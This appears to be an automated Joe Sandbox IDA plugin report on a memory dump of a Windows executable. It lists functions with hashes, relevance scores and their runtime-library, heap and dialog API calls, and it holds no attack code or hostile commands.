Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 134ad2d357cf89ec36a72aad8229ccd3ae8b1400b69278aa38fc2f8af1ed8954
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 8FC14D3B2051930EDB2E4679A5B413EBEA15AA27B131B077FD4B7CB2D5FE20C524D620

Function 003DF25E Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: d0d5f16f50a10e49da6c0555ec9083d05331673f3440b9f8bcab808e904efd59
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 5EC1613B2051930EDF2E467AA5B403FBAA15AA27B131B077ED4B7CB7D4FE10C5649620

Function 003DEE46 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: e630595135a8171631ea0a25dc8b45e9954de44cbcd21f41a81122e9bcbf39e4
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: D1C16F3B2050930EDB2E4679A5B413FBEA15AA27B131B076ED4B7CB6C5FE20D5249620

Function 003CD5E4 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75774a51e8be4fe88a194ab34cf7b0c141bcf9c4d70ae2d172ef7b118ae7ffcb
Instruction ID: 71f84e8ba8a77df04d3ee40af5e26cca525e1196a1981d252a45094b8cf8de9b
Opcode Fuzzy Hash: 75774a51e8be4fe88a194ab34cf7b0c141bcf9c4d70ae2d172ef7b118ae7ffcb
Instruction Fuzzy Hash: 1EE147755083808FC345CF29D89096ABBF0AFDA300F49096EF9D5973A2C735E916CB62

Function 003D2DB5 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
Instruction ID: 574dbc22f39984df1fc86714aff6e9264b90889b34ac7beddd8df51f18db7453
Opcode Fuzzy Hash: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
Instruction Fuzzy Hash: 72913BB22047498BD726EF64E895BBF73D9AB60304F10092FE597CB382DBB49944C752

Function 003E2B78 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 395bcdada239448cd595334b32031e4aafdc237a89cef5c63e5ebc5e9a3696b2
Instruction ID: 0ebb0317716ebdc5a43ffc5c02c0dbb41721bbda6891a2a8da086961efa95870
Opcode Fuzzy Hash: 395bcdada239448cd595334b32031e4aafdc237a89cef5c63e5ebc5e9a3696b2
Instruction Fuzzy Hash: 586178716006F9A6DA3B4E2BCC96BFF639CEB11700F250B19E983DF6C1D651AD828315

Function 003D30E6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
Instruction ID: 9ccfc0330f879d2df433e87b6fef20ea9235987bab055d1404e1d495424bb7a8
Opcode Fuzzy Hash: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
Instruction Fuzzy Hash: 1E7159727043464BDB26DF29E8C5BAE37D5AB91304F01092FE986CB382CA749E84C757

Function 003CD1D2 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12e4128cccea6cb590d5499885a10ba12eb68a22b776a93f639db4a2b250a096
Instruction ID: 16e6c5cf1e38744cda65a464be43e635cfb74f1f5fb4fe11e038722814e4e76d
Opcode Fuzzy Hash: 12e4128cccea6cb590d5499885a10ba12eb68a22b776a93f639db4a2b250a096
Instruction Fuzzy Hash: 1881AC9221A2D09EC7075F3D39E42B53EA45B73301F1D09FAD8C5D62B3C0368A58DB26

Function 003CEC97 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cedcb4eb196ac236a3c385a0754946c97209376e4800844a59f32d15ae50a774
Instruction ID: cf52bad7ad1dacaa7588ca8abe588242ca3bda06b0907bf6b64b9f113813542f
Opcode Fuzzy Hash: cedcb4eb196ac236a3c385a0754946c97209376e4800844a59f32d15ae50a774
Instruction Fuzzy Hash: 72512471A083128FC748CF19D49059AF7E1FF88314F058A2EE899E7741DB34EA59CB96

Function 003D2B3A Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
Instruction ID: dc7a366ec3c6daacec1e6135656654aee7134425f37ccb53afbaa29574398be3
Opcode Fuzzy Hash: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
Instruction Fuzzy Hash: 4831E0B26047098FCB19DF29D85126EBBD0FBA5305F00452EE48ADB341C674ED09CB52

Function 003C5E96 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4487955362f26ccd639dff9714222e82fce1d9a1e558851b147c6ad12195d7bf
Instruction ID: 95e69e0058db0e63281b360ea7574c3ac407b15965f4dea33371aa45bdf962f0
Opcode Fuzzy Hash: 4487955362f26ccd639dff9714222e82fce1d9a1e558851b147c6ad12195d7bf
Instruction Fuzzy Hash: 12213D72A205664BCB09CF2DECA497677589746301B87812FED46CB2D0C635FD24C7A0

Function 003E958D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 003E95D1

Part of subcall function 003E916C: _free.LIBCMT ref: 003E9189
Part of subcall function 003E916C: _free.LIBCMT ref: 003E919B
Part of subcall function 003E916C: _free.LIBCMT ref: 003E91AD
Part of subcall function 003E916C: _free.LIBCMT ref: 003E91BF
Part of subcall function 003E916C: _free.LIBCMT ref: 003E91D1
Part of subcall function 003E916C: _free.LIBCMT ref: 003E91E3
Part of subcall function 003E916C: _free.LIBCMT ref: 003E91F5
Part of subcall function 003E916C: _free.LIBCMT ref: 003E9207
Part of subcall function 003E916C: _free.LIBCMT ref: 003E9219
Part of subcall function 003E916C: _free.LIBCMT ref: 003E922B
Part of subcall function 003E916C: _free.LIBCMT ref: 003E923D
Part of subcall function 003E916C: _free.LIBCMT ref: 003E924F
Part of subcall function 003E916C: _free.LIBCMT ref: 003E9261

_free.LIBCMT ref: 003E95C6

Part of subcall function 003E59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?), ref: 003E59D8
Part of subcall function 003E59C2: GetLastError.KERNEL32(?,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?,?), ref: 003E59EA

_free.LIBCMT ref: 003E95E8
_free.LIBCMT ref: 003E95FD
_free.LIBCMT ref: 003E9608
_free.LIBCMT ref: 003E962A
_free.LIBCMT ref: 003E963D
_free.LIBCMT ref: 003E964B
_free.LIBCMT ref: 003E9656
_free.LIBCMT ref: 003E968E
_free.LIBCMT ref: 003E9695
_free.LIBCMT ref: 003E96B2
_free.LIBCMT ref: 003E96CA

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 936eff4db4a73d66c65d9ab7ddd70b49f1e170db63f337f528dffd2bc9d8655b
Instruction ID: e30dd789f22dc4a3a0c34ad7233767edcef46c5497552f9e8be01eb62c6e129f
Opcode Fuzzy Hash: 936eff4db4a73d66c65d9ab7ddd70b49f1e170db63f337f528dffd2bc9d8655b
Instruction Fuzzy Hash: CD315E716047A5EFDF23AA3AD845B9673E9AF41320F11461BF489DB1D2DF31AC808B10

Function 003DB8BC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 003DB8DD
GetClassNameW.USER32(00000000,?,00000800), ref: 003DB90C

Part of subcall function 003D0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,003CAC49,?,?,?,003CABF8,?,-00000002,?,00000000,?), ref: 003D0B28

GetWindowLongW.USER32(00000000,000000F0), ref: 003DB92A
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 003DB941
GetObjectW.GDI32(00000000,00000018,?), ref: 003DB954

Part of subcall function 003D8B22: GetDC.USER32(00000000), ref: 003D8B2E
Part of subcall function 003D8B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 003D8B3D
Part of subcall function 003D8B22: ReleaseDC.USER32(00000000,00000000), ref: 003D8B4B

Part of subcall function 003D8ADF: GetDC.USER32(00000000), ref: 003D8AEB
Part of subcall function 003D8ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 003D8AFA
Part of subcall function 003D8ADF: ReleaseDC.USER32(00000000,00000000), ref: 003D8B08

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 003DB97B
DeleteObject.GDI32(00000000), ref: 003DB982
GetWindow.USER32(00000000,00000002), ref: 003DB98B

Strings

STATIC, xrefs: 003DB912

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 1444658586-1882779555
Opcode ID: 9fd9ebff20dbbb6b589314c127ac87fd6d7f3a4abe5fe30981f251cd4a449762
Instruction ID: 26e8cc3280a8e3f0f3583cff0671fc25f8efcd0903aaf6746e257ad0f9c2faa1
Opcode Fuzzy Hash: 9fd9ebff20dbbb6b589314c127ac87fd6d7f3a4abe5fe30981f251cd4a449762
Instruction Fuzzy Hash: BB21D8B3540614BBDB236B64EC46FFEB66CEF04701F024013FA05AA291CB745D45C6B6

Function 003E622B Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 003E623F

Part of subcall function 003E59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?), ref: 003E59D8
Part of subcall function 003E59C2: GetLastError.KERNEL32(?,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?,?), ref: 003E59EA

_free.LIBCMT ref: 003E624B
_free.LIBCMT ref: 003E6256
_free.LIBCMT ref: 003E6261
_free.LIBCMT ref: 003E626C
_free.LIBCMT ref: 003E6277
_free.LIBCMT ref: 003E6282
_free.LIBCMT ref: 003E628D
_free.LIBCMT ref: 003E6298
_free.LIBCMT ref: 003E62A6

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 752c0da590705ff72869c93940e9090ba82cbe55852579a14b38df66f01ab149
Instruction ID: 7d2a19b3644fa90e5ff60d70cfddc09c199208fc9cba6c3911b7a75e64b9715f
Opcode Fuzzy Hash: 752c0da590705ff72869c93940e9090ba82cbe55852579a14b38df66f01ab149
Instruction Fuzzy Hash: 0E11A775200658FFCF02EF56C842CD93B65FF45364B4146A1BA884F1A2DB31DE509B40

Function 003C20E6 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

;%u, xrefs: 003C241B
xc%u, xrefs: 003C265B
x%u, xrefs: 003C25FE

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: ea63bbaaf82f5e6f02546e8366672fd4c3071ac8c7f02904dd117c5eb21ec76e
Instruction ID: e691c343cf3cb1a17ab6b255a1356b54ab55bf29a55b22a7e1a264b7d0264f16
Opcode Fuzzy Hash: ea63bbaaf82f5e6f02546e8366672fd4c3071ac8c7f02904dd117c5eb21ec76e
Instruction Fuzzy Hash: 93F104716043805BDF1BEB688895FFB7799AF95300F08496DF88ADF283DA649C44C762

Function 003D995F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003C12E7: GetDlgItem.USER32(00000000,00003021), ref: 003C132B
Part of subcall function 003C12E7: SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341

EndDialog.USER32(?,00000001), ref: 003D99AF
SendMessageW.USER32(?,00000080,00000001,?), ref: 003D99DC
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 003D99F1
SetWindowTextW.USER32(?,?), ref: 003D9A02
GetDlgItem.USER32(?,00000065), ref: 003D9A0B
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 003D9A1F
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 003D9A31

Strings

LICENSEDLG, xrefs: 003D9973

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: eeabbc580e01942efb769519d1494cfbbb6c7ee93403b6a5f08decdc5949b294
Instruction ID: 434b2b777a5e1b3eabc85742451a8ea4ac9be84c97fce9aa01387a80fcdfaff1
Opcode Fuzzy Hash: eeabbc580e01942efb769519d1494cfbbb6c7ee93403b6a5f08decdc5949b294
Instruction Fuzzy Hash: 24210B732002047BD6136F75FE89F7B3B6DEB46B44F02401AF604A62A0CB729C01D676

Function 003E6552 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

